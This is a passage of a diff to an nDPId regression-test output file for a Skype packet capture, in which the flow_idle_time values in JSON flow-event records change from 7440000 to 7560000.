00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642244,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969759543,"flow_last_seen":1431969759588,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1397,10 +1397,10 @@ 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 